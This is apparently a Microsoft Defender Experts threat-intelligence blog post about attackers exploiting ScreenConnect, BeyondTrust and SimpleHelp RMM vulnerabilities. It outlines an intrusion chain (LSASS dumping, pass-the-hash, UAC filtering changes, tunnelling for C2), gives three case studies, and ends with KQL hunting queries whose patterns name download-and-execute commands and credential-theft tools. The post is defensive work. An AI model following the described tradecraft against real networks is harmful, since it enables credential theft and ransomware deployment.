Microsoft Security Experts Blog

9 MIN READ

Keys to the kingdom: RMM exploits enabling human-operated intrusions in 2024–25

Copper Contributor

May 27, 2025

The double-edged sword of RMM

Remote Monitoring and Management (RMM) tools are indispensable for modern IT operations. They enable administrators to remotely access, troubleshoot, update, and monitor systems—streamlining operations at scale. But these very features make RMM solutions extremely valuable to adversaries.

When attackers compromise an RMM tool, they’re not just breaching a single endpoint—they’re gaining privileged, persistent, and often stealthy access to a wide array of systems. RMM abuse gives adversaries an immediate pivot for post-exploitation activities like credential harvesting, lateral movement, and data exfiltration.

In 2024 and early 2025, Microsoft Defender Experts witnessed exploitation of zero-day vulnerabilities across multiple RMM platforms—including ConnectWise ScreenConnect, BeyondTrust Remote Support, and SimpleHelp. These weren't isolated incidents. They were part of coordinated, hands-on-keyboard intrusions driven by threat actors—from financially motivated groups to nation-state adversaries—moving fast, weaponizing these flaws for hands-on intrusions, lateral movement, and ransomware deployment.

This blog unpacks the key vulnerabilities, real-world attack flows, and detection insights gleaned from incidents tracked by Defender Experts.

Why RMM exploits matter more than ever

RMM is not just remote access—it’s remote privilege. By compromising an RMM tool, an attacker can instantly:

Bypass multi-layered defenses

Operate under trusted software context

That’s why vulnerabilities in these tools—especially those exposed to the Internet—represent high-value, low-effort attack vectors.

Major RMM vulnerabilities overview (2024 – Early 2025)

Simple Help Vulnerability (January 2025)

In early January 2025, Horizon3.ai alerted SimpleHelp to three critical vulnerabilities in its Remote Support software: CVE-2024-57727, which enabled unauthorized file access via path traversal, CVE-2024-57726, which allowed privilege escalation, and CVE-2024-57728, which permitted arbitrary file uploads potentially leading to remote code execution. Notified on January 6, SimpleHelp swiftly released patched versions between January 8 and 13, underscoring the severity of the flaws.

BeyondTrust Vulnerability (December 2024)

In December 2024, BeyondTrust’s Remote Support vulnerabilities came to light after anomalous behaviours were detected on their cloud platform. Reports suggest that Chinese state-sponsored hackers exploited these flaws to gain access to sensitive government and enterprise systems, including the US Treasury Department Admitted It Got Hacked by China.

ConnectWise ScreenConnect (February 2024)

In early 2024, ScreenConnect’s ConnectWise was hit by two major vulnerabilities — CVE-2024-1708 (a path traversal flaw) and CVE-2024-1709 (an authentication bypass). The latter, rated CVSS 10.0, allowed unauthenticated attackers to create admin accounts and take full control of the server. Both flaws were rapidly exploited in the wild, with public PoCs appearing within 48 hours of disclosure.

In all, the discovery of the aforementioned RMM vulnerabilities was quickly followed by real-world attacks. In each case, attackers rapidly weaponized the bugs:

Chinese APTs leveraged BeyondTrust flaws for government intrusions.

Mass exploitation campaigns used ScreenConnect bugs for initial access and lateral movement.

SimpleHelp chains enabled unauthenticated attackers to escalate privileges, exfiltrate data, and drop persistent backdoors.

Zooming in on attack paths observed by Defender Experts across multiple cases

In early 2025, threat actors began exploiting vulnerabilities in trusted remote IT tools—specifically BeyondTrust Remote Support and SimpleHelp—to breach major public sector organizations. Targets included entities supporting government operations, critical infrastructure, healthcare, higher education, and essential services such as water and sewage.

Originally intended for legitimate remote access, these tools were repurposed as stealthy intrusion channels. Once inside, adversaries rapidly escalated privileges, moved laterally across networks, and staged environments for ransomware deployment.

Common attack path observed across multiple cases:

Step 1: Abusing trusted remote access - Exploiting Bomgar SCC (Now BeyondTrust’s), ScreenConnect and SimpleHelp Remote Monitoring and Management Software vulnerabilities to gain initial access to target networks.

Step 2: Scouting the battlefield: internal recon - Once inside, the intruders map out their new territory by running host and domain-based reconnaissance commands. In some cases, to solidify their foothold, they downloaded and executed another RMM tool for persistence.

Step 3: The ghost admin: creating a hidden backdoor - They created their own stealthy admin user—a backdoor hidden in plain sight with the inconspicuous new admin accounts, they ensured long-term access and continued reconnaissance via RMM.

Step 4: Defense evasion: disabling the safety nets - The attacker disables key defensive measures. By setting the LocalAccountTokenFilterPolicy to 1, they turn off remote UAC filtering, granting full administrative privileges to remote sessions. This means that any administrative activity—whether legitimate or malicious—escapes the usual checks. Additionally, they extract and deploy multiple payloads, including stealthy drivers loaded via a binary, likely to evade or bypass detection by Windows Defender and other endpoint security solutions.

Step 5: Stealing Credentials - The LSASS Heist - Now, they turned their focus to credential dumping. Using taskmgr.exe, they dumped LSASS memory, extracting authentication secrets like Cached passwords, NTLM hashes & Kerberos tickets. With this data, they didn’t need to guess passwords. They could authenticate as real users.

Step 6: Lateral Movement in Action - With stolen credentials, they started moving across the network using NetExec (nxc)—a stealthy network exploitation tool. then leveraged Mimikatz to perform a pass-the-hash attack using the compromised user's credentials.

Step 7: Command & Control: Establishing the Covert Link - The adversary loaded Ligolo and CloudFlared—both tunneling tools—to establish a secure, outbound connection from the compromised host back to their command and control (C2) server. This tunnel lets them bypass firewall restrictions and NAT, maintain persistent remote access, and control the compromised system covertly.

The following case studies showcase real-world intrusions and illustrate the evolving tradecraft used in these RMM-based attacks.

Case Study 01: Pre-Ransomware Intrusion via BeyondTrust in government operations and infrastructure

Microsoft Defender Experts identified a targeted intrusion against a major public sector organization supporting government operations and infrastructure. The activity was attributed to Storm-1175, a financially motivated, China-based threat actor known for deploying Medusa ransomware.

Storm-1175 is known for rapidly exploiting newly disclosed vulnerabilities, particularly in remote monitoring and management (RMM) tools and virtualization platforms. In this case, the actor exploited a vulnerability in BeyondTrust’s RMM software to gain initial access.

Critically, the impacted organization had inadvertently exposed an admin jump server—a high-privilege system—directly to the internet via a remote access solution. This misconfiguration created a direct path to domain admin access, enabling the attacker to bypass internal controls and initiate a hands-on-keyboard intrusion. The threat actor swiftly conducted reconnaissance, escalated privileges, and began staging for ransomware deployment.

This incident highlights the urgent risk posed by trusted IT infrastructure being misconfigured or exposed externally. It reinforces the need for:

Timely patching of remote access software

Strict network segmentation for privileged assets

Continuous monitoring of administrative systems

Minimizing public exposure of high-value infrastructure

Misconfigurations—especially involving privileged systems—remain one of the most exploited pathways in human-operated intrusions.

Case Study 02: Pre-Ransomware intrusion via SimpleHelp in critical services sectors

In this case study threat actor exploited SimpleHelp RMM vulnerabilities to breach organizations in the healthcare and water and sewage services sectors. The intrusion progressed through a coordinated, human-operated attack chain—starting with RMM exploitation, escalating to credential theft, lateral movement, and ransomware staging.

Key actions included:

Creation of stealthy local admin accounts for persistence

Credential dumping via LSASS memory access

Lateral movement using Pass-the-Hash and NetExec

Defender evasion and tunnelling with Ligolo/Cloudflare for C2

This intrusion underscores the critical risk posed by vulnerable remote admin tools in essential service environments—where rapid escalation and lack of segmentation can lead directly to high-impact ransomware events.

Case Study 03: Ransomware intrusion via ScreenConnect in higher education to initiate full-chain ransomware deployment

In a multi-stage intrusion observed in a higher education institution, threat actors exploited ScreenConnect RMM vulnerabilities to initiate a human-operated ransomware attack that culminated in the deployment of Medusa ransomware by Day 31.

Key phases of the attack:

Day 1–2: Initial access and establishing foothold

Exploitation of ScreenConnect allowed initial access

Reconnaissance began immediately using cmd.exe for domain, host, and user enumeration

Payloads downloaded via PowerShell, wget, and Bitsadmin

A stealthy user account was created and added to high-privilege groups

SimpleHelp RMM (via Jwrapper) was deployed for persistent remote access

Day 8: persistence and deeper reconnaissance

Attackers used NetScan and SimpleHelp to scan the environment

Credential dumping via taskmgr.exe to extract LSASS memory

C2 communication established using Ligolo tunneling

Day 31: Lateral Movement & Impact

Impacket & PDQ Deploy used for lateral movement.

Registry tampering and config changes for Defender evasion.

Human-operated signs: file masquerading, new admin via Net, WDigest changes.

Medusa ransomware was deployed.

Multiple indicators of ransomware-related activity were detected, including dropped payloads and malicious commands executed from compromised accounts.

Key Takeaways:

Initial access via misconfigured RMM software remains a high-risk vector.

Credential abuse and remote tool stacking enabled stealthy, prolonged access.

Delayed ransomware deployment (Day 31) reflects strategic patience and operational control.

Higher education environments with exposed remote access tools and limited segmentation remain highly vulnerable to these human-operated attacks.

Advance hunting queries

// Identify suspicious discovery and addition to a local admin group through a RMM session

DeviceProcessEvents

| where InitiatingProcessParentFileName =~ "winpty-agent64.exe"

| where InitiatingProcessFileName in~ ("powershell.exe", "powershell_ise.exe", "cmd.exe", "pwsh.exe")

| where (

    FileName in~ ("whoami.exe", "certutil.exe", "quser.exe", "bitsadmin.exe", "dsquery.exe")

    or (tolower(ProcessCommandLine) contains "localgroup" and tolower(ProcessCommandLine) contains "/add" and tolower(ProcessCommandLine) contains "administrators")

    or ProcessCommandLine has_any ("Invoke-Expression", ".DownloadString", ".DownloadFile", "FromBase64String", "iex ", "iex(", "Invoke-WebRequest", "iwr ", "irm ", "Invoke-RestMethod")

    or (FileName =~ "net.exe" and ProcessCommandLine has_any ("user ", " group"))

)

// Identify suspicious discovery activity through RMM application

let RMMBinaries = pack_array("Screenconnect", "Remote Access", "bomgar-scc", "winpty-agent64");

DeviceProcessEvents

| where InitiatingProcessParentFileName has_any (RMMBinaries)

| where InitiatingProcessFileName has "cmd.exe" and ProcessCommandLine has_any ("nltest", "net  user", "net  group", "tasklist", "iwr", "irm", "iex", "Invoke-Expression", "Invoke-RestMethod", "Invoke-WebRequest", "curl", "Add-MpPreference", "wmic ")

| summarize RMMtool = tostring(make_set(InitiatingProcessParentFileName)), Commands = tostring(make_set(ProcessCommandLine)), CommandCount = array_length(make_set(ProcessCommandLine)), ProcessCount = array_length(make_set(FileName)) by DeviceId

| where ProcessCount > 2 and CommandCount > 2 // Change the value based on the noise

// Identify the execution of NetExec tool

DeviceProcessEvents

| where FileName has "nxc"

| where ProcessCommandLine has_any ("smb", "ldap", "ssh", "ftp", "wmi", "winrm", "rdp", "vnc", "mssql")

// Identify the execution of mstsc through mimikatz

DeviceProcessEvents

| where InitiatingProcessVersionInfoOriginalFileName has "mimikatz"

| where ProcessVersionInfoOriginalFileName has "mstsc"

Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Apply patches provided by respective vendors to address these vulnerabilities.

Apply mitigations listed in Microsoft’s technique profile on abuse of remote monitoring and management tools

Refer to our human-operated ransomware overview for general hardening recommendations against ransomware attacks

Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus tool does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.

Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.

Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings effective at stopping entire classes of threats.